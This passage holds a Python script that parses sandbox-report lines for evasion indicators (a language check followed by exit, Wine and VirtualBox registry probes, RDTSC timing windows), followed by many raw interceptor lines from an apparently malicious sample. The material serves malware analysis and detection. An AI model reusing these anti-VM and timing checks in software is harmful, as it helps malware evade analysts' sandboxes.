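    r" second address: (?P<a2>[0-9A-Fa-f]+) instructions: (?P<ins>.+)$"
)
# One disassembled instruction in the interceptor dump: "0x<offset> <mnemonic> [operands]".
INSTR = re.compile(r"0x([0-9A-Fa-f]{8}) (.*?)(?=\s0x[0-9A-Fa-f]{8}\s|$)")
BRANCH = re.compile(r"^(j[a-z]+|call|ret|loop)\b")

# Registry keys that exist only under an emulation/VM layer, keyed to the artefact they reveal.
VM_KEYS = {
    r"HKEY_CURRENT_USER\Software\Wine": "Wine",
    r"HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__": "VirtualBox (ACPI DSDT table)",
}

# Constructed sample: lines copied from the report section (paths kept verbatim).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess",
    r"Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior",
    r"Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__",
    r"Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 7BEA92 second address: 7BEA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc",
    r"Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9326FE second address: 93270E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F5828CEC306h 0x00000010 rdtsc",
    r"Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX",
]


def parse_line(line):
    """Classify one report line; returns (kind, process, payload) or None for other lines."""
    line = line.strip()
    m = EVASIVE_CHAIN.match(line)
    if m:
        return ("api_chain", m["proc"], [api.strip() for api in m["chain"].split(",")])
    m = REG_OPEN.match(line)
    if m:
        return ("reg_open", m["proc"], m["key"])
    m = RDTSC.match(line)
    if m:
        return ("rdtsc", m["proc"], (int(m["a1"], 16), int(m["a2"], 16), m["ins"]))
    return None


def parse_instructions(dump):
    """Split the interceptor's instruction dump into (offset, text) pairs."""
    return [(int(off, 16), text.strip()) for off, text in INSTR.findall(dump)]


def rdtsc_window_stats(dump):
    """Measure the timed region between the first and last rdtsc of one dump."""
    instrs = parse_instructions(dump)
    reads = [i for i, (_, text) in enumerate(instrs) if text == "rdtsc"]
    if len(reads) < 2:
        return None
    first, last = reads[0], reads[-1]
    inner = instrs[first + 1:last]
    return {
        "inner_count": len(inner),                       # junk instructions between the reads
        "byte_span": instrs[last][0] - instrs[first][0],  # bytes from first rdtsc to second
        "has_branches": any(BRANCH.match(text) for _, text in inner),
    }


def summarize(lines):
    """Group evasion indicators per process: locale exit, VM artefacts, RDTSC windows."""
    out = defaultdict(lambda: {"locale_exit": False, "vm_artifacts": set(), "rdtsc_windows": []})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        kind, proc, payload = parsed
        entry = out[proc]
        if kind == "api_chain" and "GetUserDefaultLangID" in payload and "ExitProcess" in payload:
            entry["locale_exit"] = True
        elif kind == "reg_open" and payload in VM_KEYS:
            entry["vm_artifacts"].add(VM_KEYS[payload])
        elif kind == "rdtsc":
            a1, a2, dump = payload
            stats = rdtsc_window_stats(dump)
            if stats:
                # Cross-check the dump against the two addresses the interceptor reported.
                stats.update(first=a1, second=a2, consistent=(a2 - a1) == stats["byte_span"])
                entry["rdtsc_windows"].append(stats)
    return {p: {**e, "vm_artifacts": sorted(e["vm_artifacts"])} for p, e in out.items()}


def techniques(entry):
    """ATT&CK labels for one process entry (this mapping is an assumption made here)."""
    labels = []
    if entry["locale_exit"]:
        labels.append("T1614.001 System Location Discovery: System Language Discovery")
    if entry["vm_artifacts"]:
        labels.append("T1497.001 Virtualization/Sandbox Evasion: System Checks")
    if entry["rdtsc_windows"]:
        labels.append("T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion")
    return labels


if __name__ == "__main__":
    for proc, entry in summarize(SAMPLE_LINES).items():
        print(proc)
        print("  techniques:", techniques(entry))
        for w in entry["rdtsc_windows"]:
            print(f"  rdtsc {w['first']:X}->{w['second']:X}: {w['inner_count']} inner instrs, "
                  f"{w['byte_span']} bytes, branches={w['has_branches']}, consistent={w['consistent']}")
```

Feed the whole report section to `summarize` and the RDTSC windows with large `byte_span` and branches are the ones worth opening in a disassembler: a delta threshold check after such a window is where the sample decides it is being emulated. The `consistent` flag is a cheap sanity check that the dump belongs to the address pair printed on the same line.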
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 7BF1E2 second address: 7BEA92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F5828CEC315h 0x00000010 jmp 00007F5828CEC30Fh 0x00000015 nop 0x00000016 jmp 00007F5828CEC317h 0x0000001b push dword ptr [ebp+122D1685h] 0x00000021 jno 00007F5828CEC30Ch 0x00000027 call dword ptr [ebp+122D389Ah] 0x0000002d pushad 0x0000002e jns 00007F5828CEC31Dh 0x00000034 xor eax, eax 0x00000036 add dword ptr [ebp+122D1A4Ch], ecx 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 pushad 0x00000041 mov dword ptr [ebp+122D1EFAh], edi 0x00000047 popad 0x00000048 mov dword ptr [ebp+122D29CCh], eax 0x0000004e js 00007F5828CEC312h 0x00000054 js 00007F5828CEC30Ch 0x0000005a sub dword ptr [ebp+122D1D98h], esi 0x00000060 sub dword ptr [ebp+122D1F2Ch], ecx 0x00000066 mov esi, 0000003Ch 0x0000006b cld 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 mov dword ptr [ebp+122D1A4Ch], esi 0x00000076 lodsw 0x00000078 jmp 00007F5828CEC318h 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 clc 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 stc 0x00000087 push eax 0x00000088 push esi 0x00000089 push eax 0x0000008a push edx 0x0000008b pushad 0x0000008c popad 0x0000008d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 7BEA92 second address: 7BEA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9326FE second address: 93270E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F5828CEC306h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 93270E second address: 932718 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5828704A66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 932859 second address: 932862 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 932862 second address: 932868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 932868 second address: 93286D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 932C31 second address: 932C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007F5828704A66h 0x0000000b jl 00007F5828704A66h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jmp 00007F5828704A6Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5828704A76h 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 932C69 second address: 932C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 932C6D second address: 932C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935CC9 second address: 935CDB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F5828CEC306h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935CDB second address: 935D9B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D381Dh], ebx 0x00000014 push 00000000h 0x00000016 mov esi, dword ptr [ebp+122D2838h] 0x0000001c push AC4A6A3Fh 0x00000021 jg 00007F5828704A77h 0x00000027 jmp 00007F5828704A71h 0x0000002c add dword ptr [esp], 53B59641h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F5828704A68h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d stc 0x0000004e push 00000003h 0x00000050 jmp 00007F5828704A75h 0x00000055 push 00000000h 0x00000057 xor dword ptr [ebp+122D1F2Ch], edx 0x0000005d push 00000003h 0x0000005f mov ecx, dword ptr [ebp+122D28F4h] 0x00000065 push D4A09635h 0x0000006a push esi 0x0000006b jmp 00007F5828704A74h 0x00000070 pop esi 0x00000071 xor dword ptr [esp], 14A09635h 0x00000078 mov edi, dword ptr [ebp+122D2940h] 0x0000007e lea ebx, dword ptr [ebp+1244AB95h] 0x00000084 sub cl, 0000002Ah 0x00000087 xchg eax, ebx 0x00000088 push eax 0x00000089 push edx 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d popad 0x0000008e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935D9B second address: 935D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935D9F second address: 935DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935EC0 second address: 935EC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935EC4 second address: 935EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b je 00007F5828704A72h 0x00000011 jo 00007F5828704A6Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935EDD second address: 935EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [eax] 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F5828CEC306h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935EEC second address: 935F14 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5828704A74h 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 je 00007F5828704A74h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935F14 second address: 935F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935F1A second address: 935F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dl, bh 0x00000008 push 00000003h 0x0000000a push 00000000h 0x0000000c mov edx, 3EB584ABh 0x00000011 jo 00007F5828704A7Fh 0x00000017 call 00007F5828704A76h 0x0000001c push esi 0x0000001d pop esi 0x0000001e pop edx 0x0000001f push 00000003h 0x00000021 push 83C34CDFh 0x00000026 pushad 0x00000027 jmp 00007F5828704A6Fh 0x0000002c push eax 0x0000002d push edx 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935F65 second address: 935FAC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 3C3CB321h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F5828CEC308h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c lea ebx, dword ptr [ebp+1244AB9Eh] 0x00000032 mov esi, dword ptr [ebp+122D2944h] 0x00000038 xchg eax, ebx 0x00000039 push ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c jno 00007F5828CEC306h 0x00000042 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 93602D second address: 93603E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 93603E second address: 936042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 936042 second address: 93608C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edi 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F5828704A68h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov edi, 52B5CB0Fh 0x0000002f push 00000000h 0x00000031 mov di, 8D13h 0x00000035 call 00007F5828704A69h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 93608C second address: 936090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 936090 second address: 936096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 936096 second address: 936103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F5828CEC306h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 jp 00007F5828CEC308h 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jns 00007F5828CEC31Ch 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 jmp 00007F5828CEC30Eh 0x0000002b jmp 00007F5828CEC319h 0x00000030 popad 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 936103 second address: 936107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 956FA1 second address: 956FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 956FA7 second address: 956FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5828704A66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 956FB2 second address: 956FD1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5828CEC315h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 95531D second address: 95534D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5828704A6Ch 0x00000008 push edx 0x00000009 jmp 00007F5828704A72h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F5828704A68h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 955495 second address: 955499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 955499 second address: 9554C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Eh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 jp 00007F5828704A66h 0x00000019 je 00007F5828704A66h 0x0000001f pop edi 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9554C5 second address: 9554D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC30Eh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9558B4 second address: 9558B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 955D11 second address: 955D15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 955D15 second address: 955D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5828704A6Dh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 955EA9 second address: 955EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 955EAD second address: 955EB9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jne 00007F5828704A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 94BEED second address: 94BEF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 94BEF5 second address: 94BEFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 94BEFB second address: 94BEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 94BEFF second address: 94BF26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Fh 0x00000007 jbe 00007F5828704A66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F5828704A66h 0x00000017 jnp 00007F5828704A66h 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 92096E second address: 920985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F5828CEC30Dh 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 920985 second address: 920989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 920989 second address: 920997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 920997 second address: 92099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 92099B second address: 92099F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 92099F second address: 9209A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9209A5 second address: 9209AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9209AB second address: 9209AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9209AF second address: 9209B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9209B5 second address: 9209C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F5828704A66h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9568BE second address: 9568C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9568C3 second address: 9568D6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5828704A6Eh 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9568D6 second address: 9568DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 95A0C6 second address: 95A0D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F5828704A68h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9275B2 second address: 9275B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 95C36F second address: 95C375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 962430 second address: 962436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 961965 second address: 96196C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96200B second address: 962024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 jmp 00007F5828CEC30Fh 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 963771 second address: 963775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96383F second address: 963855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC312h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
